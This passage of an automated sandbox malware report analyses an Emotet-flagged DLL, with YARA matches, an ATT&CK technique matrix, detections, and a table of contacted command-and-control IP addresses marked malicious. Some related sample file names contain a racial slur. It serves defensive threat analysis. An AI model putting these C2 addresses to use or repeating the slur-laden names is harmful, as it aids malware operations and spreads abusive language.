Source: svchost.exe, 0000000C.00000002.799608607.000002126D43D000.00000004.00000001.sdmp	Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.799352659.000002126D429000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.800023296.000002126D502000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 7.2.rundll32.exe.ac4248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e041f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.ac4248.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f0e3f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f0e3f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e041f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.753889449.0000000002DB5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.622227585.0000000000E90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.622259831.0000000000EFC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.582748176.0000000000675000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.604540735.0000000000AAA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.622753667.0000000002DEA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.604509096.0000000000990000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.585330942.0000000002E36000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection12	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery151	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	System Information Discovery123	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
snBYiBAMB2.dll	25%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.rundll32.exe.990000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.2cb0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
1.2.loaddll32.exe.e90000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.4700000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.2f10000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.combled	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000A.00000002.448544315.000002A54E440000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 0000000A.00000003.410874299.000002A54E468000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.459059998.000002A54E46A000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000A.00000003.414087604.000002A54E445000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.449956261.000002A54E44C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.448544315.000002A54E440000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000003.414087604.000002A54E445000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.449956261.000002A54E44C000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000002.447740433.000002A54E43D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000003.414059377.000002A54E45D000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.combled	svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000A.00000003.412843267.000002A54E45F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457686821.000002A54E460000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000A.00000002.447740433.000002A54E43D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000A.00000002.439435350.000002A54E413000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000003.414059377.000002A54E45D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
104.245.52.73	unknown	United States	63251	METRO-WIRELESSUS	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
51.68.175.8	unknown	France	16276	OVHFR	true
103.8.26.102	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
103.8.26.103	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
210.57.217.132	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.184.25.237	unknown	Turkey	209711	MUVHOSTTR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532249
Start date:	01.12.2021
Start time:	21:39:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	snBYiBAMB2 (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winDLL@35/2@0/29
EGA Information:	Failed
HDC Information:	Successful, ratio: 36.9% (good quality ratio 35.2%) Quality average: 72.1% Quality standard deviation: 25.3%
HCA Information:	Successful, ratio: 78% Number of executed functions: 56 Number of non-executed functions: 256
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 23.35.236.56, 52.251.79.25, 40.91.112.76, 20.54.110.249 Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:42:37	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	6zAcNlJXo7.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse
212.237.17.99	6zAcNlJXo7.dll	Get hash	malicious	Browse
	6zAcNlJXo7.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ARUBA-ASNIT	6zAcNlJXo7.dll	Get hash	malicious	Browse	212.237.56.116
	6zAcNlJXo7.dll	Get hash	malicious	Browse	212.237.56.116
	DHL DOCUMENT FOR #504.exe	Get hash	malicious	Browse	62.149.128.40
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	invoice template 33142738819.docx	Get hash	malicious	Browse	94.177.217.88
RACKCORP-APRackCorpAU	6zAcNlJXo7.dll	Get hash	malicious	Browse	110.232.117.186
	6zAcNlJXo7.dll	Get hash	malicious	Browse	110.232.117.186
	mal.dll	Get hash	malicious	Browse	110.232.117.186
	mal2.dll	Get hash	malicious	Browse	110.232.117.186
	mal.dll	Get hash	malicious	Browse	110.232.117.186
	mal2.dll	Get hash	malicious	Browse	110.232.117.186
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	110.232.117.186
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	110.232.117.186
	9sQccNfqAR.dll	Get hash	malicious	Browse	110.232.117.186
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	110.232.117.186
	9sQccNfqAR.dll	Get hash	malicious	Browse	110.232.117.186
	t3XtgyQEoe.dll	Get hash	malicious	Browse	110.232.117.186
	t3XtgyQEoe.dll	Get hash	malicious	Browse	110.232.117.186
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse	110.232.117.186
	U4pi8WRxNJ.dll	Get hash	malicious	Browse	110.232.117.186
	oERkAQeB4d.dll	Get hash	malicious	Browse	110.232.117.186
	FC9fpZrma1.dll	Get hash	malicious	Browse	110.232.117.186
	Z4HpRSQD6I.dll	Get hash	malicious	Browse	110.232.117.186
	uLCt7sc5se.dll	Get hash	malicious	Browse	110.232.117.186
	rGF1Xgw9Il.dll	Get hash	malicious	Browse	110.232.117.186
OnlineSASFR	6zAcNlJXo7.dll	Get hash	malicious	Browse	195.154.133.20
	6zAcNlJXo7.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	51.15.17.195
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	195.154.133.20
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	67MPsax8fd.exe	Get hash	malicious	Browse	163.172.208.8
	Linux_x86	Get hash	malicious	Browse	212.83.174.79
	184285013-044310-Factura pendiente (2).exe	Get hash	malicious	Browse	212.83.130.20
	MTjXit7IJn	Get hash	malicious	Browse	51.158.219.54

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.1623855628144644
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z0+Ut:j+s+v+b+P+m+0+Q+q+D+Ut
MD5:	71CC33C92A040B1FBB33C0B71A141AAB
SHA1:	26E36B3FD6648A8FA719479E373D00B2D72AFE79
SHA-256:	65C9951C6373E80FA3F6F9F1A6A2B05082185D6853C773A25A0496F86465616D
SHA-512:	E4A5134CE42793DCF68BE8F1342E0D7CAD0ADAECAF3296FCA70D1EB309A8B1545BF084FB17637105606D10FB2CE6E195629146217D2000BCEB72AB819D8E4D6A
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211202_054042_931.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.8115487201863103
Encrypted:	false
